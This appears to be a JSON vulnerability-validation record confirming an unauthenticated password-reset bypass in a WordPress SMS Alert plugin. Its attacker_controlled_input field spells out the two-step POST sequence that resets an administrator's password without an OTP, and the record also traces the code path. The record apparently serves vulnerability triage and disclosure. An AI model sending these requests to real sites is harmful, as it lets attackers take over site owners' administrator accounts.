{
  "claim_outcome": "confirmed",
  "claim_block_reason": null,
  "repro_result": "confirmed",
  "validated_surface": "api_remote",
  "evidence_scope": "production_path",
  "claimed_impact_class": "privilege_escalation",
  "observed_impact_class": "privilege_escalation",
  "exploitability_confidence": "high",
  "attacker_controlled_input": "Unauthenticated POST to wp-login.php?action=lostpassword with user_login=<admin_phone>&wc_reset_password=true (sets session), then POST with option=smsalert-change-password-form&smsalert_user_newpwd=<attacker_pwd>&smsalert_user_cnfpwd=<attacker_pwd> (resets password without OTP)",
  "trigger_path": "wp-login.php?action=lostpassword → lostpassword_post hook → WPResetPassword::startSmsalertResetPasswordProcess() → smsalert_site_challenge_otp() sets $_SESSION['user_login'] → POST ?option=smsalert-change-password-form → WPResetPassword::routeData() → handleSmsalertChangedPwd() → reset_password($admin, $attacker_pwd)",
  "end_to_end_target_reached": true,
  "sanitizer_used": false,
  "crash_observed": false,
  "read_write_primitive_observed": false,
  "exploit_chain_demonstrated": true,
  "blocking_mitigation": null,
  "inferred": false
}
